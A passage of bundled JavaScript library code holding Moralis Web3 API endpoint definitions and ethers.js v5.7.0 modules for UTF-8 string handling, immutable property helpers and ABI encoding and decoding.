        "transactionHash"
    ],
    urlSearchParamNames: [
        "chain"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$3,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$3,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$3,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$3
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$3(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        transactionHash: request.transactionHash
    };
}
function $3dfc2d9370ba0cd1$var$serializeRequest$3(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        transactionHash: request.transactionHash
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$3(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        transactionHash: jsonRequest.transactionHash
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$3(jsonResponse, request, core) {
    return (jsonResponse !== null && jsonResponse !== void 0 ? jsonResponse : []).map(function(transaction) {
        var chain = $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core);
        return $3dfc2d9370ba0cd1$export$9a834303a812ec41.create({
            chain: chain,
            blockHash: transaction.block_hash,
            blockNumber: transaction.block_number,
            from: transaction.from,
            gas: transaction.gas,
            gasUsed: transaction.gas_used,
            input: transaction.input,
            output: transaction.output,
            to: transaction.to,
            transactionHash: transaction.transaction_hash,
            type: transaction.type,
            value: transaction.value
        });
    });
}
/** Run a given function of a contract ABI and retrieve readonly data. */ var $3dfc2d9370ba0cd1$export$2abac9b6e6aa0dbf = {
    method: "POST",
    name: "runContractFunction",
    id: "runContractFunction",
    groupName: "utils",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain",
        "functionName"
    ],
    urlPathPattern: "/{address}/function",
    bodyType: "properties",
    bodyParamNames: [
        "abi",
        "params"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$2,
    getRequestBody: $3dfc2d9370ba0cd1$var$getRequestBody,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$2,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$2,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$2
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$2(request, core) {
    return {
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        function_name: request.functionName
    };
}
function $3dfc2d9370ba0cd1$var$getRequestBody(request) {
    return {
        abi: request.abi,
        params: request.params
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$2(jsonResponse) {
    return jsonResponse;
}
function $3dfc2d9370ba0cd1$var$serializeRequest$2(request, core) {
    return {
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum,
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        functionName: request.functionName,
        abi: request.abi,
        params: request.params
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$2(jsonRequest) {
    return {
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address),
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        functionName: jsonRequest.functionName,
        abi: jsonRequest.abi,
        params: jsonRequest.params
    };
}
/** Get the endpoint price list for rate limits and cost. */ var $3dfc2d9370ba0cd1$export$d262eedb63f47b39 = {
    method: "GET",
    name: "endpointWeights",
    id: "endpointWeights",
    groupName: "utils",
    urlPathPattern: "/info/endpointWeights",
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$1,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$1,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$1,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$1
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$1() {
    return {};
}
function $3dfc2d9370ba0cd1$var$serializeRequest$1() {
    return undefined;
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$1() {
    return {};
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$1(jsonResponse) {
    return jsonResponse;
}
/** Get the current version of the Moralis Web3 API. */ var $3dfc2d9370ba0cd1$export$8b95044b39d79226 = {
    method: "GET",
    name: "web3ApiVersion",
    id: "web3ApiVersion",
    groupName: "utils",
    urlPathPattern: "/web3/version",
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams() {
    return {};
}
function $3dfc2d9370ba0cd1$var$serializeRequest() {
    return undefined;
}
function $3dfc2d9370ba0cd1$var$deserializeRequest() {
    return {};
}
function $3dfc2d9370ba0cd1$var$deserializeResponse(jsonResponse) {
    return jsonResponse;
}
var $3dfc2d9370ba0cd1$export$98fbccab943d12e2 = [
    $3dfc2d9370ba0cd1$export$62e0feeeee341a27,
    $3dfc2d9370ba0cd1$export$6ec0913c942c04c3,
    $3dfc2d9370ba0cd1$export$1d9fd9956238b29,
    $3dfc2d9370ba0cd1$export$1a7550f6b237748b,
    $3dfc2d9370ba0cd1$export$21b0ec1fd3742c57,
    $3dfc2d9370ba0cd1$export$f8b05e1b1d8e8d98,
    $3dfc2d9370ba0cd1$export$9affd740a9b8ad81,
    $3dfc2d9370ba0cd1$export$63cbd81d3736e8e1,
    $3dfc2d9370ba0cd1$export$9ca00ae4093f2b0a,
    $3dfc2d9370ba0cd1$export$254df2181393dbc7,
    $3dfc2d9370ba0cd1$export$a1e62a5f47027c1d,
    $3dfc2d9370ba0cd1$export$70045e42822758c2,
    $3dfc2d9370ba0cd1$export$bc5bdb9c52bdbae0,
    $3dfc2d9370ba0cd1$export$91aa7fb1b02fe81d,
    $3dfc2d9370ba0cd1$export$54a4252f1046e878,
    $3dfc2d9370ba0cd1$export$4767c6e68c3a24f7,
    $3dfc2d9370ba0cd1$export$3f6c30a742da9ae,
    $3dfc2d9370ba0cd1$export$ac0acee6dae00396,
    $3dfc2d9370ba0cd1$export$d0862a1d34b55e14,
    $3dfc2d9370ba0cd1$export$fab71468f9b1bd68,
    $3dfc2d9370ba0cd1$export$4c8b5b836c918cf8,
    $3dfc2d9370ba0cd1$export$d413e2c33fff25bf,
    $3dfc2d9370ba0cd1$export$eebe7b17fddf7123,
    $3dfc2d9370ba0cd1$export$35c74b1c5e54b671,
    $3dfc2d9370ba0cd1$export$30dee9f56bd044aa,
    $3dfc2d9370ba0cd1$export$b722950d28f32054,
    $3dfc2d9370ba0cd1$export$fc69d783890468cd,
    $3dfc2d9370ba0cd1$export$699bb7c67626970,
    $3dfc2d9370ba0cd1$export$4b742acef4c40754,
    $3dfc2d9370ba0cd1$export$5666de66a01cbd37,
    $3dfc2d9370ba0cd1$export$596d8eca99fc248e,
    $3dfc2d9370ba0cd1$export$a7f18fa4ab405966,
    $3dfc2d9370ba0cd1$export$2446d41cee2f639c,
    $3dfc2d9370ba0cd1$export$59de9565a776890f,
    $3dfc2d9370ba0cd1$export$a787c09a62ee9e2d,
    $3dfc2d9370ba0cd1$export$bc6181f6a7d3e941,
    $3dfc2d9370ba0cd1$export$ac08e7d18d7354a7,
    $3dfc2d9370ba0cd1$export$f51a3715ba5a6e0c,
    $3dfc2d9370ba0cd1$export$42c99d178d9486c8,
    $3dfc2d9370ba0cd1$export$7af7fa88f6da397b,
    $3dfc2d9370ba0cd1$export$c37fa52dec548eb2,
    $3dfc2d9370ba0cd1$export$2abac9b6e6aa0dbf,
    $3dfc2d9370ba0cd1$export$905c7ba175e51715,
    $3dfc2d9370ba0cd1$export$e620f1cc2d1a3557,
    $3dfc2d9370ba0cd1$export$cc02ac16615509b4
];
/**
 * @deprecated This list includes upgraded operations to the hybrid approach in the old format.
 */ var $3dfc2d9370ba0cd1$export$c8101ad4d0b09783 = $3dfc2d9370ba0cd1$var$__spreadArray($3dfc2d9370ba0cd1$var$__spreadArray([], $3dfc2d9370ba0cd1$export$98fbccab943d12e2, true), [
    $3dfc2d9370ba0cd1$export$d262eedb63f47b39,
    $3dfc2d9370ba0cd1$export$8b95044b39d79226,
    $3dfc2d9370ba0cd1$export$2a578995a1c7d86b,
    $3dfc2d9370ba0cd1$export$11d16d0532d3e4f8
], false);








const $f9bb23bb4b058849$export$83d89fbfd8236492 = "strings/5.7.0";


"use strict";
const $b2a54ce293d87a2e$var$logger = new (0, $97a8d5981d597bb7$export$efa9a398d6368992)((0, $f9bb23bb4b058849$export$83d89fbfd8236492));
var $b2a54ce293d87a2e$export$c6986442964129f5;
(function(UnicodeNormalizationForm) {
    UnicodeNormalizationForm["current"] = "";
    UnicodeNormalizationForm["NFC"] = "NFC";
    UnicodeNormalizationForm["NFD"] = "NFD";
    UnicodeNormalizationForm["NFKC"] = "NFKC";
    UnicodeNormalizationForm["NFKD"] = "NFKD";
})($b2a54ce293d87a2e$export$c6986442964129f5 || ($b2a54ce293d87a2e$export$c6986442964129f5 = {}));
var $b2a54ce293d87a2e$export$c285fa6ac15ff6a6;
(function(Utf8ErrorReason) {
    // A continuation byte was present where there was nothing to continue
    // - offset = the index the codepoint began in
    Utf8ErrorReason["UNEXPECTED_CONTINUE"] = "unexpected continuation byte";
    // An invalid (non-continuation) byte to start a UTF-8 codepoint was found
    // - offset = the index the codepoint began in
    Utf8ErrorReason["BAD_PREFIX"] = "bad codepoint prefix";
    // The string is too short to process the expected codepoint
    // - offset = the index the codepoint began in
    Utf8ErrorReason["OVERRUN"] = "string overrun";
    // A missing continuation byte was expected but not found
    // - offset = the index the continuation byte was expected at
    Utf8ErrorReason["MISSING_CONTINUE"] = "missing continuation byte";
    // The computed code point is outside the range for UTF-8
    // - offset       = start of this codepoint
    // - badCodepoint = the computed codepoint; outside the UTF-8 range
    Utf8ErrorReason["OUT_OF_RANGE"] = "out of UTF-8 range";
    // UTF-8 strings may not contain UTF-16 surrogate pairs
    // - offset       = start of this codepoint
    // - badCodepoint = the computed codepoint; inside the UTF-16 surrogate range
    Utf8ErrorReason["UTF16_SURROGATE"] = "UTF-16 surrogate";
    // The string is an overlong representation
    // - offset       = start of this codepoint
    // - badCodepoint = the computed codepoint; already bounds checked
    Utf8ErrorReason["OVERLONG"] = "overlong representation";
})($b2a54ce293d87a2e$export$c285fa6ac15ff6a6 || ($b2a54ce293d87a2e$export$c285fa6ac15ff6a6 = {}));
function $b2a54ce293d87a2e$var$errorFunc(reason, offset, bytes, output, badCodepoint) {
    return $b2a54ce293d87a2e$var$logger.throwArgumentError(`invalid codepoint at offset ${offset}; ${reason}`, "bytes", bytes);
}
function $b2a54ce293d87a2e$var$ignoreFunc(reason, offset, bytes, output, badCodepoint) {
    // If there is an invalid prefix (including stray continuation), skip any additional continuation bytes
    if (reason === $b2a54ce293d87a2e$export$c285fa6ac15ff6a6.BAD_PREFIX || reason === $b2a54ce293d87a2e$export$c285fa6ac15ff6a6.UNEXPECTED_CONTINUE) {
        let i = 0;
        for(let o = offset + 1; o < bytes.length; o++){
            if (bytes[o] >> 6 !== 0x02) break;
            i++;
        }
        return i;
    }
    // This byte runs us past the end of the string, so just jump to the end
    // (but the first byte was read already read and therefore skipped)
    if (reason === $b2a54ce293d87a2e$export$c285fa6ac15ff6a6.OVERRUN) return bytes.length - offset - 1;
    // Nothing to skip
    return 0;
}
function $b2a54ce293d87a2e$var$replaceFunc(reason, offset, bytes, output, badCodepoint) {
    // Overlong representations are otherwise "valid" code points; just non-deistingtished
    if (reason === $b2a54ce293d87a2e$export$c285fa6ac15ff6a6.OVERLONG) {
        output.push(badCodepoint);
        return 0;
    }
    // Put the replacement character into the output
    output.push(0xfffd);
    // Otherwise, process as if ignoring errors
    return $b2a54ce293d87a2e$var$ignoreFunc(reason, offset, bytes, output, badCodepoint);
}
const $b2a54ce293d87a2e$export$c6e2180c5bb5bc05 = Object.freeze({
    error: $b2a54ce293d87a2e$var$errorFunc,
    ignore: $b2a54ce293d87a2e$var$ignoreFunc,
    replace: $b2a54ce293d87a2e$var$replaceFunc
});
// http://stackoverflow.com/questions/13356493/decode-utf-8-with-javascript#13691499
function $b2a54ce293d87a2e$var$getUtf8CodePoints(bytes, onError) {
    if (onError == null) onError = $b2a54ce293d87a2e$export$c6e2180c5bb5bc05.error;
    bytes = (0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)(bytes);
    const result = [];
    let i = 0;
    // Invalid bytes are ignored
    while(i < bytes.length){
        const c = bytes[i++];
        // 0xxx xxxx
        if (c >> 7 === 0) {
            result.push(c);
            continue;
        }
        // Multibyte; how many bytes left for this character?
        let extraLength = null;
        let overlongMask = null;
        // 110x xxxx 10xx xxxx
        if ((c & 0xe0) === 0xc0) {
            extraLength = 1;
            overlongMask = 0x7f;
        // 1110 xxxx 10xx xxxx 10xx xxxx
        } else if ((c & 0xf0) === 0xe0) {
            extraLength = 2;
            overlongMask = 0x7ff;
        // 1111 0xxx 10xx xxxx 10xx xxxx 10xx xxxx
        } else if ((c & 0xf8) === 0xf0) {
            extraLength = 3;
            overlongMask = 0xffff;
        } else {
            if ((c & 0xc0) === 0x80) i += onError($b2a54ce293d87a2e$export$c285fa6ac15ff6a6.UNEXPECTED_CONTINUE, i - 1, bytes, result);
            else i += onError($b2a54ce293d87a2e$export$c285fa6ac15ff6a6.BAD_PREFIX, i - 1, bytes, result);
            continue;
        }
        // Do we have enough bytes in our data?
        if (i - 1 + extraLength >= bytes.length) {
            i += onError($b2a54ce293d87a2e$export$c285fa6ac15ff6a6.OVERRUN, i - 1, bytes, result);
            continue;
        }
        // Remove the length prefix from the char
        let res = c & (1 << 8 - extraLength - 1) - 1;
        for(let j = 0; j < extraLength; j++){
            let nextChar = bytes[i];
            // Invalid continuation byte
            if ((nextChar & 0xc0) != 0x80) {
                i += onError($b2a54ce293d87a2e$export$c285fa6ac15ff6a6.MISSING_CONTINUE, i, bytes, result);
                res = null;
                break;
            }
            res = res << 6 | nextChar & 0x3f;
            i++;
        }
        // See above loop for invalid continuation byte
        if (res === null) continue;
        // Maximum code point
        if (res > 0x10ffff) {
            i += onError($b2a54ce293d87a2e$export$c285fa6ac15ff6a6.OUT_OF_RANGE, i - 1 - extraLength, bytes, result, res);
            continue;
        }
        // Reserved for UTF-16 surrogate halves
        if (res >= 0xd800 && res <= 0xdfff) {
            i += onError($b2a54ce293d87a2e$export$c285fa6ac15ff6a6.UTF16_SURROGATE, i - 1 - extraLength, bytes, result, res);
            continue;
        }
        // Check for overlong sequences (more bytes than needed)
        if (res <= overlongMask) {
            i += onError($b2a54ce293d87a2e$export$c285fa6ac15ff6a6.OVERLONG, i - 1 - extraLength, bytes, result, res);
            continue;
        }
        result.push(res);
    }
    return result;
}
function $b2a54ce293d87a2e$export$8feeb310b4b4752f(str, form = $b2a54ce293d87a2e$export$c6986442964129f5.current) {
    if (form != $b2a54ce293d87a2e$export$c6986442964129f5.current) {
        $b2a54ce293d87a2e$var$logger.checkNormalize();
        str = str.normalize(form);
    }
    let result = [];
    for(let i = 0; i < str.length; i++){
        const c = str.charCodeAt(i);
        if (c < 0x80) result.push(c);
        else if (c < 0x800) {
            result.push(c >> 6 | 0xc0);
            result.push(c & 0x3f | 0x80);
        } else if ((c & 0xfc00) == 0xd800) {
            i++;
            const c2 = str.charCodeAt(i);
            if (i >= str.length || (c2 & 0xfc00) !== 0xdc00) throw new Error("invalid utf-8 string");
            // Surrogate Pair
            const pair = 0x10000 + ((c & 0x03ff) << 10) + (c2 & 0x03ff);
            result.push(pair >> 18 | 0xf0);
            result.push(pair >> 12 & 0x3f | 0x80);
            result.push(pair >> 6 & 0x3f | 0x80);
            result.push(pair & 0x3f | 0x80);
        } else {
            result.push(c >> 12 | 0xe0);
            result.push(c >> 6 & 0x3f | 0x80);
            result.push(c & 0x3f | 0x80);
        }
    }
    return (0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)(result);
}
function $b2a54ce293d87a2e$var$escapeChar(value) {
    const hex = "0000" + value.toString(16);
    return "\\u" + hex.substring(hex.length - 4);
}
function $b2a54ce293d87a2e$export$a7a0ec15960b9055(bytes, onError) {
    return '"' + $b2a54ce293d87a2e$var$getUtf8CodePoints(bytes, onError).map((codePoint)=>{
        if (codePoint < 256) {
            switch(codePoint){
                case 8:
                    return "\\b";
                case 9:
                    return "\\t";
                case 10:
                    return "\\n";
                case 13:
                    return "\\r";
                case 34:
                    return '\\"';
                case 92:
                    return "\\\\";
            }
            if (codePoint >= 32 && codePoint < 127) return String.fromCharCode(codePoint);
        }
        if (codePoint <= 0xffff) return $b2a54ce293d87a2e$var$escapeChar(codePoint);
        codePoint -= 0x10000;
        return $b2a54ce293d87a2e$var$escapeChar((codePoint >> 10 & 0x3ff) + 0xd800) + $b2a54ce293d87a2e$var$escapeChar((codePoint & 0x3ff) + 0xdc00);
    }).join("") + '"';
}
function $b2a54ce293d87a2e$export$232e1dab03132235(codePoints) {
    return codePoints.map((codePoint)=>{
        if (codePoint <= 0xffff) return String.fromCharCode(codePoint);
        codePoint -= 0x10000;
        return String.fromCharCode((codePoint >> 10 & 0x3ff) + 0xd800, (codePoint & 0x3ff) + 0xdc00);
    }).join("");
}
function $b2a54ce293d87a2e$export$7643a1dc2c38d5eb(bytes, onError) {
    return $b2a54ce293d87a2e$export$232e1dab03132235($b2a54ce293d87a2e$var$getUtf8CodePoints(bytes, onError));
}
function $b2a54ce293d87a2e$export$ae470a36a31b28c2(str, form = $b2a54ce293d87a2e$export$c6986442964129f5.current) {
    return $b2a54ce293d87a2e$var$getUtf8CodePoints($b2a54ce293d87a2e$export$8feeb310b4b4752f(str, form));
}


function $7cd0a9996bd6b341$export$d560c7e4a29451c2(text) {
    return (0, $1dbc6131e27af3ca$export$f8151fce47ad1c35)((0, $b2a54ce293d87a2e$export$8feeb310b4b4752f)(text));
}



var $a463a6b5f08d6875$exports = {};

$parcel$export($a463a6b5f08d6875$exports, "defineReadOnly", () => $a463a6b5f08d6875$export$104236534534f9be);
$parcel$export($a463a6b5f08d6875$exports, "getStatic", () => $a463a6b5f08d6875$export$f695fbbf3cdaaf47);
$parcel$export($a463a6b5f08d6875$exports, "Description", () => $a463a6b5f08d6875$export$393edc798c47379d);

const $ec235c03b0398629$export$83d89fbfd8236492 = "properties/5.7.0";


"use strict";
var $a463a6b5f08d6875$var$__awaiter = undefined && undefined.__awaiter || function(thisArg, _arguments, P, generator) {
    function adopt(value) {
        return value instanceof P ? value : new P(function(resolve) {
            resolve(value);
        });
    }
    return new (P || (P = Promise))(function(resolve, reject) {
        function fulfilled(value) {
            try {
                step(generator.next(value));
            } catch (e) {
                reject(e);
            }
        }
        function rejected(value) {
            try {
                step(generator["throw"](value));
            } catch (e) {
                reject(e);
            }
        }
        function step(result) {
            result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected);
        }
        step((generator = generator.apply(thisArg, _arguments || [])).next());
    });
};
const $a463a6b5f08d6875$var$logger = new (0, $97a8d5981d597bb7$export$efa9a398d6368992)((0, $ec235c03b0398629$export$83d89fbfd8236492));
function $a463a6b5f08d6875$export$104236534534f9be(object, name, value) {
    Object.defineProperty(object, name, {
        enumerable: true,
        value: value,
        writable: false
    });
}
function $a463a6b5f08d6875$export$f695fbbf3cdaaf47(ctor, key) {
    for(let i = 0; i < 32; i++){
        if (ctor[key]) return ctor[key];
        if (!ctor.prototype || typeof ctor.prototype !== "object") break;
        ctor = Object.getPrototypeOf(ctor.prototype).constructor;
    }
    return null;
}
function $a463a6b5f08d6875$export$d503dd157d963b60(object) {
    return $a463a6b5f08d6875$var$__awaiter(this, void 0, void 0, function*() {
        const promises = Object.keys(object).map((key)=>{
            const value = object[key];
            return Promise.resolve(value).then((v)=>({
                    key: key,
                    value: v
                }));
        });
        const results = yield Promise.all(promises);
        return results.reduce((accum, result)=>{
            accum[result.key] = result.value;
            return accum;
        }, {});
    });
}
function $a463a6b5f08d6875$export$ae5a316ba623b73a(object, properties) {
    if (!object || typeof object !== "object") $a463a6b5f08d6875$var$logger.throwArgumentError("invalid object", "object", object);
    Object.keys(object).forEach((key)=>{
        if (!properties[key]) $a463a6b5f08d6875$var$logger.throwArgumentError("invalid object key - " + key, "transaction:" + key, object);
    });
}
function $a463a6b5f08d6875$export$9c13236873b118a5(object) {
    const result = {};
    for(const key in object)result[key] = object[key];
    return result;
}
const $a463a6b5f08d6875$var$opaque = {
    bigint: true,
    boolean: true,
    "function": true,
    number: true,
    string: true
};
function $a463a6b5f08d6875$var$_isFrozen(object) {
    // Opaque objects are not mutable, so safe to copy by assignment
    if (object === undefined || object === null || $a463a6b5f08d6875$var$opaque[typeof object]) return true;
    if (Array.isArray(object) || typeof object === "object") {
        if (!Object.isFrozen(object)) return false;
        const keys = Object.keys(object);
        for(let i = 0; i < keys.length; i++){
            let value = null;
            try {
                value = object[keys[i]];
            } catch (error) {
                continue;
            }
            if (!$a463a6b5f08d6875$var$_isFrozen(value)) return false;
        }
        return true;
    }
    return $a463a6b5f08d6875$var$logger.throwArgumentError(`Cannot deepCopy ${typeof object}`, "object", object);
}
// Returns a new copy of object, such that no properties may be replaced.
// New properties may be added only to objects.
function $a463a6b5f08d6875$var$_deepCopy(object) {
    if ($a463a6b5f08d6875$var$_isFrozen(object)) return object;
    // Arrays are mutable, so we need to create a copy
    if (Array.isArray(object)) return Object.freeze(object.map((item)=>$a463a6b5f08d6875$export$6c40052bed430212(item)));
    if (typeof object === "object") {
        const result = {};
        for(const key in object){
            const value = object[key];
            if (value === undefined) continue;
            $a463a6b5f08d6875$export$104236534534f9be(result, key, $a463a6b5f08d6875$export$6c40052bed430212(value));
        }
        return result;
    }
    return $a463a6b5f08d6875$var$logger.throwArgumentError(`Cannot deepCopy ${typeof object}`, "object", object);
}
function $a463a6b5f08d6875$export$6c40052bed430212(object) {
    return $a463a6b5f08d6875$var$_deepCopy(object);
}
class $a463a6b5f08d6875$export$393edc798c47379d {
    constructor(info){
        for(const key in info)this[key] = $a463a6b5f08d6875$export$6c40052bed430212(info[key]);
    }
}





const $7b99b6039539a6c4$export$83d89fbfd8236492 = "abi/5.7.0";







"use strict";
const $2c0f0ed4c5bed241$var$logger = new (0, $97a8d5981d597bb7$export$efa9a398d6368992)((0, $7b99b6039539a6c4$export$83d89fbfd8236492));
function $2c0f0ed4c5bed241$export$5546b9ec21157cc2(result) {
    // Find the first error (if any)
    const errors = [];
    const checkErrors = function(path, object) {
        if (!Array.isArray(object)) return;
        for(let key in object){
            const childPath = path.slice();
            childPath.push(key);
            try {
                checkErrors(childPath, object[key]);
            } catch (error) {
                errors.push({
                    path: childPath,
                    error: error
                });
            }
        }
    };
    checkErrors([], result);
    return errors;
}
class $2c0f0ed4c5bed241$export$2c0c39526f8bad46 {
    constructor(name, type, localName, dynamic){
        // @TODO: defineReadOnly these
        this.name = name;
        this.type = type;
        this.localName = localName;
        this.dynamic = dynamic;
    }
    _throwError(message, value) {
        $2c0f0ed4c5bed241$var$logger.throwArgumentError(message, this.localName, value);
    }
}
class $2c0f0ed4c5bed241$export$d7a960146e1a269e {
    constructor(wordSize){
        (0, $a463a6b5f08d6875$exports.defineReadOnly)(this, "wordSize", wordSize || 32);
        this._data = [];
        this._dataLength = 0;
        this._padding = new Uint8Array(wordSize);
    }
    get data() {
        return (0, $7b88b6e03e4708f2$export$6d4b99629b38754a)(this._data);
    }
    get length() {
        return this._dataLength;
    }
    _writeData(data) {
        this._data.push(data);
        this._dataLength += data.length;
        return data.length;
    }
    appendWriter(writer) {
        return this._writeData((0, $7b88b6e03e4708f2$export$ee1b3e54f0441b22)(writer._data));
    }
    // Arrayish items; padded on the right to wordSize
    writeBytes(value) {
        let bytes = (0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)(value);
        const paddingOffset = bytes.length % this.wordSize;
        if (paddingOffset) bytes = (0, $7b88b6e03e4708f2$export$ee1b3e54f0441b22)([
            bytes,
            this._padding.slice(paddingOffset)
        ]);
        return this._writeData(bytes);
    }
    _getValue(value) {
        let bytes = (0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)((0, $0df4577496dcf693$export$d97aa349ed20696).from(value));
        if (bytes.length > this.wordSize) $2c0f0ed4c5bed241$var$logger.throwError("value out-of-bounds", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.BUFFER_OVERRUN, {
            length: this.wordSize,
            offset: bytes.length
        });
        if (bytes.length % this.wordSize) bytes = (0, $7b88b6e03e4708f2$export$ee1b3e54f0441b22)([
            this._padding.slice(bytes.length % this.wordSize),
            bytes
        ]);
        return bytes;
    }
    // BigNumberish items; padded on the left to wordSize
    writeValue(value) {
        return this._writeData(this._getValue(value));
    }
    writeUpdatableValue() {
        const offset = this._data.length;
        this._data.push(this._padding);
        this._dataLength += this.wordSize;
        return (value)=>{
            this._data[offset] = this._getValue(value);
        };
    }
}
class $2c0f0ed4c5bed241$export$2f7a2f0e90c07dc4 {
    constructor(data, wordSize, coerceFunc, allowLoose){
        (0, $a463a6b5f08d6875$exports.defineReadOnly)(this, "_data", (0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)(data));
        (0, $a463a6b5f08d6875$exports.defineReadOnly)(this, "wordSize", wordSize || 32);
        (0, $a463a6b5f08d6875$exports.defineReadOnly)(this, "_coerceFunc", coerceFunc);
        (0, $a463a6b5f08d6875$exports.defineReadOnly)(this, "allowLoose", allowLoose);
        this._offset = 0;
    }
    get data() {
        return (0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)(this._data);
    }
    get consumed() {
        return this._offset;
    }
    // The default Coerce function
    static coerce(name, value) {
        let match = name.match("^u?int([0-9]+)$");
        if (match && parseInt(match[1]) <= 48) value = value.toNumber();
        return value;
    }
    coerce(name, value) {
        if (this._coerceFunc) return this._coerceFunc(name, value);
        return $2c0f0ed4c5bed241$export$2f7a2f0e90c07dc4.coerce(name, value);
    }
    _peekBytes(offset, length, loose) {
        let alignedLength = Math.ceil(length / this.wordSize) * this.wordSize;
        if (this._offset + alignedLength > this._data.length) {
            if (this.allowLoose && loose && this._offset + length <= this._data.length) alignedLength = length;
            else $2c0f0ed4c5bed241$var$logger.throwError("data out-of-bounds", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.BUFFER_OVERRUN, {
                length: this._data.length,
                offset: this._offset + alignedLength
            });
        }
        return this._data.slice(this._offset, this._offset + alignedLength);
    }
    subReader(offset) {
        return new $2c0f0ed4c5bed241$export$2f7a2f0e90c07dc4(this._data.slice(this._offset + offset), this.wordSize, this._coerceFunc, this.allowLoose);
    }
    readBytes(length, loose) {
        let bytes = this._peekBytes(0, length, !!loose);
        this._offset += bytes.length;
        // @TODO: Make sure the length..end bytes are all 0?
        return bytes.slice(0, length);
    }
    readValue() {
        return (0, $0df4577496dcf693$export$d97aa349ed20696).from(this.readBytes(this.wordSize));
    }
}





"use strict";
class $22f6893c208a0a4e$export$59dbbded7775bfe7 extends (0, $2c0f0ed4c5bed241$export$2c0c39526f8bad46) {
    constructor(localName){
        super("address", "address", localName, false);
    }
    defaultValue() {
        return "0x0000000000000000000000000000000000000000";
    }
    encode(writer, value) {
        try {
            value = (0, $8aee8aee2d40605d$export$88411125f012957a)(value);
        } catch (error) {
            this._throwError(error.message, value);
        }
        return writer.writeValue(value);
    }
    decode(reader) {
        return (0, $8aee8aee2d40605d$export$88411125f012957a)((0, $7b88b6e03e4708f2$export$e9c46a54370b47e8)(reader.readValue().toHexString(), 20));
    }
}






"use strict";
class $3a25498c1332da4a$export$87c41d1139a03fa2 extends (0, $2c0f0ed4c5bed241$export$2c0c39526f8bad46) {
    constructor(coder){
        super(coder.name, coder.type, undefined, coder.dynamic);
        this.coder = coder;
    }
    defaultValue() {
        return this.coder.defaultValue();
    }
    encode(writer, value) {
        return this.coder.encode(writer, value);
    }
    decode(reader) {
        return this.coder.decode(reader);
    }
}


"use strict";
const $a30effb870f18115$var$logger = new (0, $97a8d5981d597bb7$export$efa9a398d6368992)((0, $7b99b6039539a6c4$export$83d89fbfd8236492));
function $a30effb870f18115$export$2a703dbb0cb35339(writer, coders, values) {
    let arrayValues = null;
    if (Array.isArray(values)) arrayValues = values;
    else if (values && typeof values === "object") {
        let unique = {};
        arrayValues = coders.map((coder)=>{
            const name = coder.localName;
            if (!name) $a30effb870f18115$var$logger.throwError("cannot encode object for signature with missing names", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.INVALID_ARGUMENT, {
                argument: "values",
                coder: coder,
                value: values
            });
            if (unique[name]) $a30effb870f18115$var$logger.throwError("cannot encode object for signature with duplicate names", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.INVALID_ARGUMENT, {
                argument: "values",
                coder: coder,
                value: values
            });
            unique[name] = true;
            return values[name];
        });
    } else $a30effb870f18115$var$logger.throwArgumentError("invalid tuple value", "tuple", values);
    if (coders.length !== arrayValues.length) $a30effb870f18115$var$logger.throwArgumentError("types/value length mismatch", "tuple", values);
    let staticWriter = new (0, $2c0f0ed4c5bed241$export$d7a960146e1a269e)(writer.wordSize);
    let dynamicWriter = new (0, $2c0f0ed4c5bed241$export$d7a960146e1a269e)(writer.wordSize);
